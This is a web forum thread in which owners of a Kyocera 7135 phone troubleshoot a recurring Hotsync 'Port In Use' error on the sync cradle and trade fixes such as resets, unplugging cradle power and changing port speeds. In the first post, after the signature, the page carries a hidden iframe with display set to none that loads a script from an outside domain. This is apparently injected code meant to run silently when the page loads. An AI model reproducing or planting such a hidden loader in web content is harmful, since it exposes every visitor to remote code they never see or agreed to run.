+ Reply to Thread
Page 1 of 2 1 2 LastLast

Hotsync "Port In Use" Message... Solved - I Think

I've done a couple of searches in the forum and although there have been multiple discussions on this topic and several people have been getting this message, I don't see anybody that has solved the problem.

When I get the problem, I can use the Hotsync application but I just can't push the Hotsync button on the cradle. I get a "Port In Use" message.

I have tried restarting the Hotsync program but that doesn't fix the problem. I can do a soft reset and the problem does go away.

I think I have pinpointed a specific action that causes the problem to reappear. After I get the tone at the end of a Hotsync, I get a message which states... "optimizing quick contact match database". If I remove the phone from the cradle before this message disappears, I can't hotsync with the cradle. If I leave it in the cradle until this message disappears, then everything is OK. I have been assuming that since I get the "finished tone" with Hotsync, it was OK to remove the phone... but guess not.

Also, does anybody know what this "optimizing message" is all about? I didn't get it with my 6025.

Regards, Steve Yarbrough (aka SLYDoggie)<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Regards, Steve

The quick match data base is what the palm side uses to quickly search your address book to display a name in the caller id. I am not entirely sure how it works, but I believe the DB strip all info except for name and phone numbers.

Hope this helps!

Tom
    To most people, the sky is the limit.
    To those who love flight, the sky is home

Re: Hotsync "Port In Use" Message... Solved - I Think

Originally posted by SLYDoggie
    I've done a couple of searches in the forum and although there have been multiple discussions on this topic and several people have been getting this message, I don't see anybody that has solved the problem.

When I get the problem, I can use the Hotsync application but I just can't push the Hotsync button on the cradle. I get a "Port In Use" message.

I have tried restarting the Hotsync program but that doesn't fix the problem. I can do a soft reset and the problem does go away.

I think I have pinpointed a specific action that causes the problem to reappear. After I get the tone at the end of a Hotsync, I get a message which states... "optimizing quick contact match database". If I remove the phone from the cradle before this message disappears, I can't hotsync with the cradle. If I leave it in the cradle until this message disappears, then everything is OK. I have been assuming that since I get the "finished tone" with Hotsync, it was OK to remove the phone... but guess not.

Also, does anybody know what this "optimizing message" is all about? I didn't get it with my 6025.

Regards, Steve Yarbrough (aka SLYDoggie)
    WHAT IF THAT DOESN'T WORK? I NEVER TAKE IT OFF BEFORE IT IS ENTIRELY DONE. I AHVE BEEN ON HOLD FOREVER WITH KYOCERA.

Re: Hotsync "Port In Use" Message... Solved - I Think

Originally posted by SLYDoggie

Regards, Steve Yarbrough (aka SLYDoggie)

I JUST HOTSYNCED FROM THE PHONE AND NOT THE CRADLE AND IT WORKED. THE BUTTON STILL DOESN'T WORK THOUGH

Just removiing/replacing the battery (reset) fixes it for me.

Turning the Phone OFF and then back ON fixed the problem for me.
    John H. Boyd

Just removing the phone from the cradle and puttting it back in fixes it for me. I get it once every while

Originally posted by MisterEd
    Just removiing/replacing the battery (reset) fixes it for me.
    i thought taking the battery out clears the whole phone out?

Originally posted by RCRAMER
    i thought taking the battery out clears the whole phone out?
    Nope. There is a capacitor. I took mine out to read the serial #s to someone on the phone. Must have been at least a full minute? When I reinstalled the battery the phone booted the same as doing a soft reset. Not sure how big the cap is but if you leave the battery out long enough it will have the effect of a hard reset.

Otherwise the utility of haveing a replaceable battery would be almost nill...:alieneyes

-Quick

I've gone 12 minutes with no loss. Haven't tried longer yet.

Originally posted by Quick
    Nope. There is a capacitor. I took mine out to read the serial #s to someone on the phone. Must have been at least a full minute? When I reinstalled the battery the phone booted the same as doing a soft reset. Not sure how big the cap is but if you leave the battery out long enough it will have the effect of a hard reset.

Otherwise the utility of haveing a replaceable battery would be almost nill...:alieneyes

-Quick

My hot sync button on the cradle started working intermitently and then quit working altogether. I am using a G4 PowerBook with OS X.

I tried everything I could think of and decided that I had a faulty cradle. I got a replacement through the Verizon store where I bought the phone. The brand new cradle did the same thing. Ooops.

After reading this post I did a hard reset and it synced with the cradle button the first time, but would not sync with the button after that. I can hot sync with the icon on the 7135 screen.

I have no solution yet but I imagine that the stores and Kyocera are going to be getting a lot of calls if this is a recurring problem.

Frank

One thing that I found which caused this problem for me was to install an application which required a soft reset at the end of the sync process. (This is normal for some of the more complex apps. I think it might have been Kinoma in this case.) Anyway, it asked me to hit the reset button before the Quick Contacts dialog came up. I don't think the lack of the Quick Contacts dialog is what's causing the problem, but I do think what's happening is that something in the sync process in not able to complete, and some flag which says that the sync port is still busy is being left in the wrong state.

Interestingly, this last time, soft resets did not fix the problem for me. What did fix it was to unplug the power cable from the sync cradle, leaving the phone operating on battery while syncing. I've had this message come up a few times, but the only time it didn't go away after a reset was when the power was plugged into the cradle. (I'd just bought a second charger to keep with the cradle.) Now I just do either power or sync, as a rule. I'd be interested to know if this makes any difference to anyone else's error messages!

Originally posted by turboCat
    One thing that I found which caused this problem for me was to install an application which required a soft reset at the end of the sync process. (This is normal for some of the more complex apps. I think it might have been Kinoma in this case.) Anyway, it asked me to hit the reset button before the Quick Contacts dialog came up. I don't think the lack of the Quick Contacts dialog is what's causing the problem, but I do think what's happening is that something in the sync process in not able to complete, and some flag which says that the sync port is still busy is being left in the wrong state.

Interestingly, this last time, soft resets did not fix the problem for me. What did fix it was to unplug the power cable from the sync cradle, leaving the phone operating on battery while syncing. I've had this message come up a few times, but the only time it didn't go away after a reset was when the power was plugged into the cradle. (I'd just bought a second charger to keep with the cradle.) Now I just do either power or sync, as a rule. I'd be interested to know if this makes any difference to anyone else's error messages!
    I DON'T HAVE POWER TO MINE. I KEEP THE POWER AT HOME AND THE CRADLE AT WORK. I HAVE JUST RESOLVED THE FACT THE I WILL HAVE TO USE THE SCREEN.

I may be ahead of myself, but after a few days of play with my new toy (yeah!) - and experiencing this problem, I think I may have figured it out. I'm using the Serial port hook up BTW, my phone, under PDA prefs -> Connection -> Cradle/Cable -> Edit -> Details -> speed ; was set to 57,600. On my desktop (win9, Hotsync -> Setup -> Local -> Speed ; was set to 115200. I changed the desktop to Fast as Possible and set the 7135 to 230,400 bps. Did a soft reset and so far have been able to do multiple syncs using the cradle button, after removing the phone and reinserting, turning the phone off and on etc. Prior, I'd get one sync using the cradle button after my computer was freshly booted and the phone just soft reset. After that one sync the button stopped working and I had to use the screen method to start a sync. Hope this helps.

This phone is just too cool !!!

Originally posted by Stan Wood
    I may be ahead of myself, but after a few days of play with my new toy (yeah!) - and experiencing this problem, I think I may have figured it out. I'm using the Serial port hook up BTW, my phone, under PDA prefs -> Connection -> Cradle/Cable -> Edit -> Details -> speed ; was set to 57,600. On my desktop (win9, Hotsync -> Setup -> Local -> Speed ; was set to 115200. I changed the desktop to Fast as Possible and set the 7135 to 230,400 bps. Did a soft reset and so far have been able to do multiple syncs using the cradle button, after removing the phone and reinserting, turning the phone off and on etc. Prior, I'd get one sync using the cradle button after my computer was freshly booted and the phone just soft reset. After that one sync the button stopped working and I had to use the screen method to start a sync. Hope this helps.

This phone is just too cool !!!
    OK STAN WOOD! YOU ARE THE MAN. FINALLY!!!! A SOLUTION THAT WORKS! NOT BAD FOR YOUR FIRST POST!

ITS TOO BAD THAT KYOCERA TECH SUPPORT COULDN'T EVEN FIGURE IT OUT. I WAITED ON HOLD FOR LIKE AN HOUR.

DRC
    Matched my PC and palm at 115,200, and just had it happen again. The search continues...
    DRC

Originally posted by DRC
    Matched my PC and palm at 115,200, and just had it happen again. The search continues...
    USE THE INSTRUCTIONS STATED EARLIER IN THIS THREAD.
    ON THE DESKTOP SOFTWARE, SET IT FOR AS FAST AS POSSIBLE.

ON THE PHONE UNDER CONNECTION, DETAILS, SET IT FOR THE HIGHEST WHICH IS LIKE 225,000 OR SOMETHING. THAT WILL FIX IT.

I use USB and have this problem, so the port setting aren't an issue at least for me.

Originally posted by MisterEd
    I use USB and have this problem, so the port setting aren't an issue at least for me.
    change the speed on the phone to the maximum, it is under cable cradle. that includes usb.

under the setup in the hotsync manager on the pc, it doesn't make a difference whether it is usb or serial. they both use a com port. the only difference on the desktop is the check mark on the "usb" when you right click on the hot sync manger icon.

Still happens at any speed. USB is NOT the same a serial when it comes to speed. They both do NOT use a com port. USB isn't a (hardware) com port. Serial->serial could be hardware flow control issue (although it really shouldn't matter if the 2 are different speeds but I can't speak to that 'cause I don't use serial). You may or may not just have been lucky. In my case (USB) it didn't help.

Originally posted by RCRAMER
    change the speed on the phone to the maximum, it is under cable cradle. that includes usb.

under the setup in the hotsync manager on the pc, it doesn't make a difference whether it is usb or serial. they both use a com port. the only difference on the desktop is the check mark on the "usb" when you right click on the hot sync manger icon.